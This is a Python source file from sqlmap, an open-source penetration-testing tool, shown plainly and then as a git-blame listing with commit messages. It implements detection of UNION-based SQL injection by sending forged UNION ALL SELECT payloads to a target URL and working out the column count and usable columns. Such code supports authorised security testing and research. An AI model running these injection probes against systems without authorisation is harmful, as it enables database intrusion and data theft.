sqlmap/lib/techniques/inband/union/test.py

#!/usr/bin/env python

"""
$Id$

Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)
See the file 'doc/COPYING' for copying permission
"""

import random
import re
import time

from lib.core.agent import agent
from lib.core.common import average
from lib.core.common import Backend
from lib.core.common import clearConsoleLine
from lib.core.common import dataToStdout
from lib.core.common import extractRegexResult
from lib.core.common import getUnicode
from lib.core.common import listToStrValue
from lib.core.common import parseUnionPage
from lib.core.common import popValue
from lib.core.common import pushValue
from lib.core.common import randomStr
from lib.core.common import stdev
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import queries
from lib.core.enums import DBMS
from lib.core.enums import PAYLOAD
from lib.core.settings import FROM_TABLE
from lib.core.settings import UNION_STDEV_COEFF
from lib.core.settings import MIN_RATIO
from lib.core.settings import MAX_RATIO
from lib.core.settings import MIN_STATISTICAL_RANGE
from lib.core.settings import MIN_UNION_RESPONSES
from lib.core.unescaper import unescaper
from lib.parse.html import htmlParser
from lib.request.comparison import comparison
from lib.request.connect import Connect as Request

def __findUnionCharCount(comment, place, parameter, value, prefix, suffix, where=PAYLOAD.WHERE.ORIGINAL):
    """
    Finds number of columns affected by UNION based injection
    """
    retVal = None

    pushValue(kb.errorIsNone)
    items, ratios = [], []
    kb.errorIsNone = False
    lowerCount, upperCount = conf.uColsStart, conf.uColsStop

    if abs(upperCount - lowerCount) < MIN_UNION_RESPONSES:
        upperCount = lowerCount + MIN_UNION_RESPONSES

    min_, max_ = MAX_RATIO, MIN_RATIO
    for count in range(lowerCount, upperCount+1):
        query = agent.forgeInbandQuery('', -1, count, comment, prefix, suffix, conf.uChar)
        payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
        page, _ = Request.queryPage(payload, place=place, content=True, raise404=False)
        ratio = comparison(page, True) or MIN_RATIO
        ratios.append(ratio)
        min_, max_ = min(min_, ratio), max(max_, ratio)
        items.append((count, ratio))

    ratios.pop(ratios.index(min_))
    ratios.pop(ratios.index(max_))

    deviation = stdev(ratios)

    if abs(max_ - min_) < MIN_STATISTICAL_RANGE:
        return None

    lower, upper = average(ratios) - UNION_STDEV_COEFF * deviation, average(ratios) + UNION_STDEV_COEFF * deviation

    minItem, maxItem = None, None
    for item in items:
        if item[1] == min_:
            minItem = item
        elif item[1] == max_:
            maxItem = item

    if min_ < lower:
        retVal = minItem[0]
    elif max_ > upper:
        retVal = maxItem[0]

    kb.errorIsNone = popValue()

    if retVal:
        infoMsg = "target url appears to be UNION injectable with %d columns" % retVal
        logger.info(infoMsg)

    return retVal

def __unionPosition(comment, place, parameter, value, prefix, suffix, count, where=PAYLOAD.WHERE.ORIGINAL):
    validPayload = None
    vector = None

    positions = range(0, count)

    # Unbiased approach for searching appropriate usable column
    random.shuffle(positions)

    # For each column of the table (# of NULL) perform a request using
    # the UNION ALL SELECT statement to test it the target url is
    # affected by an exploitable inband SQL injection vulnerability
    for position in positions:
        # Prepare expression with delimiters
        randQuery = randomStr()
        phrase = "%s%s%s" % (kb.misc.start, randQuery, kb.misc.stop)
        randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery)
        randQueryUnescaped = unescaper.unescape(randQueryProcessed)

        # Forge the inband SQL injection request
        query = agent.forgeInbandQuery(randQueryUnescaped, position, count, comment, prefix, suffix, conf.uChar)
        payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)

        # Perform the request
        page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
        content = "%s%s" % (page or "", listToStrValue(headers.headers if headers else None) or "")

        if content and phrase in content:
            validPayload = payload
            vector = (position, count, comment, prefix, suffix, conf.uChar, where)

            if where == PAYLOAD.WHERE.ORIGINAL:
                # Prepare expression with delimiters
                randQuery2 = randomStr()
                phrase2 = "%s%s%s" % (kb.misc.start, randQuery2, kb.misc.stop)
                randQueryProcessed2 = agent.concatQuery("\'%s\'" % randQuery2)
                randQueryUnescaped2 = unescaper.unescape(randQueryProcessed2)

                # Confirm that it is a full inband SQL injection
                query = agent.forgeInbandQuery(randQueryUnescaped, position, count, comment, prefix, suffix, conf.uChar, multipleUnions=randQueryUnescaped2)
                payload = agent.payload(place=place, parameter=parameter, newValue=query, where=PAYLOAD.WHERE.NEGATIVE)

                # Perform the request
                page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
                content = "%s%s" % (page or "", listToStrValue(headers.headers if headers else None) or "")

                if content and ((phrase in content and phrase2 not in content) or (phrase not in content and phrase2 in content)):
                    vector = (position, count, comment, prefix, suffix, conf.uChar, PAYLOAD.WHERE.NEGATIVE)

            break

    return validPayload, vector

def __unionConfirm(comment, place, parameter, value, prefix, suffix, count):
    validPayload = None
    vector = None

    # Confirm the inband SQL injection and get the exact column
    # position which can be used to extract data
    validPayload, vector = __unionPosition(comment, place, parameter, value, prefix, suffix, count)

    # Assure that the above function found the exploitable full inband
    # SQL injection position
    if not validPayload:
        validPayload, vector = __unionPosition(comment, place, parameter, value, prefix, suffix, count, where=2)

    return validPayload, vector

def __unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix):
    """
    This method tests if the target url is affected by an inband
    SQL injection vulnerability. The test is done up to 50 columns
    on the target database table
    """

    validPayload = None
    vector = None
    query = agent.prefixQuery("UNION ALL SELECT %s" % conf.uChar)
    total = conf.uColsStop+1 - conf.uColsStart

    count = __findUnionCharCount(comment, place, parameter, value, prefix, suffix)

    if count:
        if Backend.getIdentifiedDbms() in FROM_TABLE and query.endswith(FROM_TABLE[Backend.getIdentifiedDbms()]):
            query = query[:-len(FROM_TABLE[Backend.getIdentifiedDbms()])]

        if count:
            query += ", %s" % conf.uChar

        if Backend.getIdentifiedDbms() in FROM_TABLE:
            query += FROM_TABLE[Backend.getIdentifiedDbms()]

        validPayload, vector = __unionConfirm(comment, place, parameter, value, prefix, suffix, count)

    return validPayload, vector

def unionTest(comment, place, parameter, value, prefix, suffix):
    """
    This method tests if the target url is affected by an inband
    SQL injection vulnerability. The test is done up to 3*50 times
    """

    if conf.direct:
        return

    kb.technique = PAYLOAD.TECHNIQUE.UNION
    validPayload, vector = __unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix)

    if validPayload:
        validPayload = agent.removePayloadDelimiters(validPayload)

    return validPayload, vector
After the storm, a restore.. 2008-10-15 19:38:22 +04:00			`#!/usr/bin/env python`

			`"""`
propsets.. 2008-10-15 19:56:32 +04:00			$Id$
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
large commit with copyright header modifications 2010-10-14 18:41:14 +04:00			`Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)`
sorry, cosmetics 2010-10-15 03:18:29 +04:00			`See the file 'doc/COPYING' for copying permission`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00			`"""`

Unbiased approach for searching appropriate usable column 2011-02-08 00:00:59 +03:00			`import random`
minor improvement 2011-01-23 14:35:24 +03:00			`import re`
adding progress to --union-test 2011-01-06 12:26:01 +03:00			`import time`

After the storm, a restore.. 2008-10-15 19:38:22 +04:00			`from lib.core.agent import agent`
adding __findUnionCharCount function 2011-02-02 14:22:35 +03:00			`from lib.core.common import average`
now union technique parses headers too 2011-01-31 15:41:39 +03:00			`from lib.core.common import Backend`
adding progress to --union-test 2011-01-06 12:26:01 +03:00			`from lib.core.common import clearConsoleLine`
			`from lib.core.common import dataToStdout`
minor improvement over last version - case insensitive and takes in count cases like " UNION ALL selects " from MySQL error message 2011-01-23 13:51:57 +03:00			`from lib.core.common import extractRegexResult`
More bug fixes to properly distinguish between full inband and single-entry inband sql injections 2010-12-22 18:47:52 +03:00			`from lib.core.common import getUnicode`
now union technique parses headers too 2011-01-31 15:41:39 +03:00			`from lib.core.common import listToStrValue`
More bug fixes to properly distinguish between full inband and single-entry inband sql injections 2010-12-22 18:47:52 +03:00			`from lib.core.common import parseUnionPage`
adding __findUnionCharCount function 2011-02-02 14:22:35 +03:00			`from lib.core.common import popValue`
			`from lib.core.common import pushValue`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`from lib.core.common import randomStr`
adding __findUnionCharCount function 2011-02-02 14:22:35 +03:00			`from lib.core.common import stdev`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00			`from lib.core.data import conf`
			`from lib.core.data import kb`
			`from lib.core.data import logger`
Minor improvement when testing for UNION query SQL injection to check only without comment and with DBMS specific comment (not anymore "random" unspecific comment characters) 2008-12-02 02:09:07 +03:00			`from lib.core.data import queries`
further refactoring (all enumerations are now put into enums.py) 2010-11-08 12:20:02 +03:00			`from lib.core.enums import DBMS`
minor update 2010-12-08 16:09:27 +03:00			`from lib.core.enums import PAYLOAD`
Major bug fix to properly process custom queries (--sql-query/--sql-shell) when technique in use is error-based. Alignment of SQL statement payload packing/unpacking between all of the techniques. Minor bug fix to use the proper charset (2, numbers) when dealing with COUNT() in custom queries too. Minor code cleanup. 2011-01-19 02:02:11 +03:00			`from lib.core.settings import FROM_TABLE`
adding __findUnionCharCount function 2011-02-02 14:22:35 +03:00			`from lib.core.settings import UNION_STDEV_COEFF`
fix for a bug reported by ahmed@isecur1ty.org (TypeError: unsupported operand type(s) for -: 'float' and 'NoneType') 2011-02-05 17:17:28 +03:00			`from lib.core.settings import MIN_RATIO`
			`from lib.core.settings import MAX_RATIO`
minor "statistical" update 2011-02-03 19:59:49 +03:00			`from lib.core.settings import MIN_STATISTICAL_RANGE`
minor update 2011-02-02 16:03:24 +03:00			`from lib.core.settings import MIN_UNION_RESPONSES`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`from lib.core.unescaper import unescaper`
			`from lib.parse.html import htmlParser`
adding __findUnionCharCount function 2011-02-02 14:22:35 +03:00			`from lib.request.comparison import comparison`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00			`from lib.request.connect import Connect as Request`

adding WHERE enum for payloads 2011-02-02 16:34:09 +03:00			`def __findUnionCharCount(comment, place, parameter, value, prefix, suffix, where=PAYLOAD.WHERE.ORIGINAL):`
adding __findUnionCharCount function 2011-02-02 14:22:35 +03:00			`"""`
			`Finds number of columns affected by UNION based injection`
			`"""`
			`retVal = None`

			`pushValue(kb.errorIsNone)`
minor update 2011-02-02 15:42:55 +03:00			`items, ratios = [], []`
adding __findUnionCharCount function 2011-02-02 14:22:35 +03:00			`kb.errorIsNone = False`
minor update 2011-02-02 16:03:24 +03:00			`lowerCount, upperCount = conf.uColsStart, conf.uColsStop`

			`if abs(upperCount - lowerCount) < MIN_UNION_RESPONSES:`
			`upperCount = lowerCount + MIN_UNION_RESPONSES`
adding __findUnionCharCount function 2011-02-02 14:22:35 +03:00
fix for a bug reported by ahmed@isecur1ty.org (TypeError: unsupported operand type(s) for -: 'float' and 'NoneType') 2011-02-05 17:17:28 +03:00			`min_, max_ = MAX_RATIO, MIN_RATIO`
minor update 2011-02-02 16:03:24 +03:00			`for count in range(lowerCount, upperCount+1):`
adding __findUnionCharCount function 2011-02-02 14:22:35 +03:00			`query = agent.forgeInbandQuery('', -1, count, comment, prefix, suffix, conf.uChar)`
			`payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)`
			`page, _ = Request.queryPage(payload, place=place, content=True, raise404=False)`
fix for a bug reported by ahmed@isecur1ty.org (TypeError: unsupported operand type(s) for -: 'float' and 'NoneType') 2011-02-05 17:17:28 +03:00			`ratio = comparison(page, True) or MIN_RATIO`
adding __findUnionCharCount function 2011-02-02 14:22:35 +03:00			`ratios.append(ratio)`
fix for a bug reported by ahmed@isecur1ty.org (TypeError: unsupported operand type(s) for -: 'float' and 'NoneType') 2011-02-05 17:17:28 +03:00			`min_, max_ = min(min_, ratio), max(max_, ratio)`
adding __findUnionCharCount function 2011-02-02 14:22:35 +03:00			`items.append((count, ratio))`

			`ratios.pop(ratios.index(min_))`
			`ratios.pop(ratios.index(max_))`

			`deviation = stdev(ratios)`
minor "statistical" update 2011-02-03 19:59:49 +03:00
			`if abs(max_ - min_) < MIN_STATISTICAL_RANGE:`
			`return None`

adding __findUnionCharCount function 2011-02-02 14:22:35 +03:00			`lower, upper = average(ratios) - UNION_STDEV_COEFF * deviation, average(ratios) + UNION_STDEV_COEFF * deviation`

			`minItem, maxItem = None, None`
minor update 2011-02-02 15:42:55 +03:00			`for item in items:`
adding __findUnionCharCount function 2011-02-02 14:22:35 +03:00			`if item[1] == min_:`
			`minItem = item`
			`elif item[1] == max_:`
			`maxItem = item`

			`if min_ < lower:`
			`retVal = minItem[0]`
			`elif max_ > upper:`
			`retVal = maxItem[0]`

			`kb.errorIsNone = popValue()`

new UNION column detection is going into wild 2011-02-03 19:16:38 +03:00			`if retVal:`
more appropriate 2011-02-03 19:48:27 +03:00			`infoMsg = "target url appears to be UNION injectable with %d columns" % retVal`
new UNION column detection is going into wild 2011-02-03 19:16:38 +03:00			`logger.info(infoMsg)`

adding __findUnionCharCount function 2011-02-02 14:22:35 +03:00			`return retVal`

adding WHERE enum for payloads 2011-02-02 16:34:09 +03:00			`def __unionPosition(comment, place, parameter, value, prefix, suffix, count, where=PAYLOAD.WHERE.ORIGINAL):`
Consolidate logger messages for --*-test switches 2010-10-31 19:58:38 +03:00			`validPayload = None`
Properly deal with partial (single entry) UNION injections. Got rid of kb.union*, now it's all stored/used from kb.injection. Minor bug fix with where=2 detection phase. 2011-01-12 15:01:32 +03:00			`vector = None`
fixes #181 - proper save/resume information about single entry UNION SQL injection 2010-03-22 18:39:29 +03:00
Unbiased approach for searching appropriate usable column 2011-02-08 00:00:59 +03:00			`positions = range(0, count)`

			`# Unbiased approach for searching appropriate usable column`
			`random.shuffle(positions)`

Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`# For each column of the table (# of NULL) perform a request using`
			`# the UNION ALL SELECT statement to test it the target url is`
			`# affected by an exploitable inband SQL injection vulnerability`
Unbiased approach for searching appropriate usable column 2011-02-08 00:00:59 +03:00			`for position in positions:`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`# Prepare expression with delimiters`
			`randQuery = randomStr()`
quick bug fix for FALSE positives with UNION based technique 2011-01-27 21:49:44 +03:00			`phrase = "%s%s%s" % (kb.misc.start, randQuery, kb.misc.stop)`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery)`
Major bug fix. Minor code refactoring. 2011-01-16 04:17:09 +03:00			`randQueryUnescaped = unescaper.unescape(randQueryProcessed)`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00
			`# Forge the inband SQL injection request`
Important bug fix. Minor code restyling. 2011-01-13 12:41:55 +03:00			`query = agent.forgeInbandQuery(randQueryUnescaped, position, count, comment, prefix, suffix, conf.uChar)`
First big commit to move UNION query tests to detection phase - there are some improvements and tuning to do yet though. Major refactoring to Agent.payload() method. Minor bug fixes, some code refactoring and a lot of core adjustments here and there. Added more checks for injection in GROUP BY and ORDER BY. 2011-01-12 01:18:47 +03:00			`payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00
			`# Perform the request`
now union technique parses headers too 2011-01-31 15:41:39 +03:00			`page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)`
			`content = "%s%s" % (page or "", listToStrValue(headers.headers if headers else None) or "")`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00
now union technique parses headers too 2011-01-31 15:41:39 +03:00			`if content and phrase in content:`
Consolidate logger messages for --*-test switches 2010-10-31 19:58:38 +03:00			`validPayload = payload`
Important bug fix. Minor code restyling. 2011-01-13 12:41:55 +03:00			`vector = (position, count, comment, prefix, suffix, conf.uChar, where)`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00
adding WHERE enum for payloads 2011-02-02 16:34:09 +03:00			`if where == PAYLOAD.WHERE.ORIGINAL:`
More bug fixes to properly distinguish between full inband and single-entry inband sql injections 2010-12-22 18:47:52 +03:00			`# Prepare expression with delimiters`
			`randQuery2 = randomStr()`
quick bug fix for FALSE positives with UNION based technique 2011-01-27 21:49:44 +03:00			`phrase2 = "%s%s%s" % (kb.misc.start, randQuery2, kb.misc.stop)`
More bug fixes to properly distinguish between full inband and single-entry inband sql injections 2010-12-22 18:47:52 +03:00			`randQueryProcessed2 = agent.concatQuery("\'%s\'" % randQuery2)`
Major bug fix. Minor code refactoring. 2011-01-16 04:17:09 +03:00			`randQueryUnescaped2 = unescaper.unescape(randQueryProcessed2)`
More bug fixes to properly distinguish between full inband and single-entry inband sql injections 2010-12-22 18:47:52 +03:00
			`# Confirm that it is a full inband SQL injection`
Important bug fix. Minor code restyling. 2011-01-13 12:41:55 +03:00			`query = agent.forgeInbandQuery(randQueryUnescaped, position, count, comment, prefix, suffix, conf.uChar, multipleUnions=randQueryUnescaped2)`
adding WHERE enum for payloads 2011-02-02 16:34:09 +03:00			`payload = agent.payload(place=place, parameter=parameter, newValue=query, where=PAYLOAD.WHERE.NEGATIVE)`
More bug fixes to properly distinguish between full inband and single-entry inband sql injections 2010-12-22 18:47:52 +03:00
			`# Perform the request`
now union technique parses headers too 2011-01-31 15:41:39 +03:00			`page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)`
			`content = "%s%s" % (page or "", listToStrValue(headers.headers if headers else None) or "")`
More bug fixes to properly distinguish between full inband and single-entry inband sql injections 2010-12-22 18:47:52 +03:00
now union technique parses headers too 2011-01-31 15:41:39 +03:00			`if content and ((phrase in content and phrase2 not in content) or (phrase not in content and phrase2 in content)):`
adding WHERE enum for payloads 2011-02-02 16:34:09 +03:00			`vector = (position, count, comment, prefix, suffix, conf.uChar, PAYLOAD.WHERE.NEGATIVE)`
More bug fixes to properly distinguish between full inband and single-entry inband sql injections 2010-12-22 18:47:52 +03:00
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`break`

Properly deal with partial (single entry) UNION injections. Got rid of kb.union*, now it's all stored/used from kb.injection. Minor bug fix with where=2 detection phase. 2011-01-12 15:01:32 +03:00			`return validPayload, vector`
fixes #181 - proper save/resume information about single entry UNION SQL injection 2010-03-22 18:39:29 +03:00
Major bug fix. Minor code refactoring. 2011-01-16 04:17:09 +03:00			`def __unionConfirm(comment, place, parameter, value, prefix, suffix, count):`
Consolidate logger messages for --*-test switches 2010-10-31 19:58:38 +03:00			`validPayload = None`
Properly deal with partial (single entry) UNION injections. Got rid of kb.union*, now it's all stored/used from kb.injection. Minor bug fix with where=2 detection phase. 2011-01-12 15:01:32 +03:00			`vector = None`
fixes #181 - proper save/resume information about single entry UNION SQL injection 2010-03-22 18:39:29 +03:00
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`# Confirm the inband SQL injection and get the exact column`
Major enhancement to --union-test check 2010-11-14 01:47:37 +03:00			`# position which can be used to extract data`
Major bug fix. Minor code refactoring. 2011-01-16 04:17:09 +03:00			`validPayload, vector = __unionPosition(comment, place, parameter, value, prefix, suffix, count)`
One more step to fully working UNION exploitation after merge into detection phase 2011-01-12 04:13:32 +03:00
			`# Assure that the above function found the exploitable full inband`
			`# SQL injection position`
			`if not validPayload:`
Major bug fix. Minor code refactoring. 2011-01-16 04:17:09 +03:00			`validPayload, vector = __unionPosition(comment, place, parameter, value, prefix, suffix, count, where=2)`
One more step to fully working UNION exploitation after merge into detection phase 2011-01-12 04:13:32 +03:00
Properly deal with partial (single entry) UNION injections. Got rid of kb.union*, now it's all stored/used from kb.injection. Minor bug fix with where=2 detection phase. 2011-01-12 15:01:32 +03:00			`return validPayload, vector`
Minor enhancement to support an option (--union-tech) to specify the technique to use to detect the number of columns used in the web application SELECT statement: NULL bruteforcing (default) or ORDER BY clause. 2008-12-22 00:39:53 +03:00
Major bug fix. Minor code refactoring. 2011-01-16 04:17:09 +03:00			`def __unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix):`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00			`"""`
			`This method tests if the target url is affected by an inband`
			`SQL injection vulnerability. The test is done up to 50 columns`
			`on the target database table`
			`"""`

First big commit to move UNION query tests to detection phase - there are some improvements and tuning to do yet though. Major refactoring to Agent.payload() method. Minor bug fixes, some code refactoring and a lot of core adjustments here and there. Added more checks for injection in GROUP BY and ORDER BY. 2011-01-12 01:18:47 +03:00			`validPayload = None`
Properly deal with partial (single entry) UNION injections. Got rid of kb.union*, now it's all stored/used from kb.injection. Minor bug fix with where=2 detection phase. 2011-01-12 15:01:32 +03:00			`vector = None`
Added new switch --union-char to be able to provide the character used in union-test and exploit (default is still NULL, but can be any) 2010-11-19 17:56:20 +03:00			`query = agent.prefixQuery("UNION ALL SELECT %s" % conf.uChar)`
Minor layout adjustment 2011-01-30 19:19:58 +03:00			`total = conf.uColsStop+1 - conf.uColsStart`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
new UNION column detection is going into wild 2011-02-03 19:16:38 +03:00			`count = __findUnionCharCount(comment, place, parameter, value, prefix, suffix)`

			`if count:`
refactoring (class names should always be Capital cased) 2011-01-28 19:36:09 +03:00			`if Backend.getIdentifiedDbms() in FROM_TABLE and query.endswith(FROM_TABLE[Backend.getIdentifiedDbms()]):`
			`query = query[:-len(FROM_TABLE[Backend.getIdentifiedDbms()])]`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
First big commit to move UNION query tests to detection phase - there are some improvements and tuning to do yet though. Major refactoring to Agent.payload() method. Minor bug fixes, some code refactoring and a lot of core adjustments here and there. Added more checks for injection in GROUP BY and ORDER BY. 2011-01-12 01:18:47 +03:00			`if count:`
Added new switch --union-char to be able to provide the character used in union-test and exploit (default is still NULL, but can be any) 2010-11-19 17:56:20 +03:00			`query += ", %s" % conf.uChar`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
refactoring (class names should always be Capital cased) 2011-01-28 19:36:09 +03:00			`if Backend.getIdentifiedDbms() in FROM_TABLE:`
			`query += FROM_TABLE[Backend.getIdentifiedDbms()]`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
Major bug fix. Minor code refactoring. 2011-01-16 04:17:09 +03:00			`validPayload, vector = __unionConfirm(comment, place, parameter, value, prefix, suffix, count)`
Minor enhancement to support an option (--union-tech) to specify the technique to use to detect the number of columns used in the web application SELECT statement: NULL bruteforcing (default) or ORDER BY clause. 2008-12-22 00:39:53 +03:00
Properly deal with partial (single entry) UNION injections. Got rid of kb.union*, now it's all stored/used from kb.injection. Minor bug fix with where=2 detection phase. 2011-01-12 15:01:32 +03:00			`return validPayload, vector`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
Major bug fix. Minor code refactoring. 2011-01-16 04:17:09 +03:00			`def unionTest(comment, place, parameter, value, prefix, suffix):`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00			`"""`
			`This method tests if the target url is affected by an inband`
			`SQL injection vulnerability. The test is done up to 3*50 times`
			`"""`

Major enhancement to directly connect to the dbms without passing via a sql injection: adapted code accordingly - see #158. This feature relies on python third-party libraries to be able to connect to the database. For the moment it has been implemented for MySQL (with python-mysqldb module) and PostgreSQL (with python-psycopg2 module). Minor layout adjustments. 2010-03-27 02:23:25 +03:00			`if conf.direct:`
			`return`

minor update 2010-12-08 16:09:27 +03:00			`kb.technique = PAYLOAD.TECHNIQUE.UNION`
Major bug fix. Minor code refactoring. 2011-01-16 04:17:09 +03:00			`validPayload, vector = __unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix)`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
Improved --union-cols to accept a range to test for union SQL injection. By default it is 1-20. 2010-11-19 18:48:24 +03:00			`if validPayload:`
centralization of urlencoding should be (only) in connect.py and we are from now on handling non-urlencoded data at other levels 2011-01-27 22:44:24 +03:00			`validPayload = agent.removePayloadDelimiters(validPayload)`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
Properly deal with partial (single entry) UNION injections. Got rid of kb.union*, now it's all stored/used from kb.injection. Minor bug fix with where=2 detection phase. 2011-01-12 15:01:32 +03:00			`return validPayload, vector`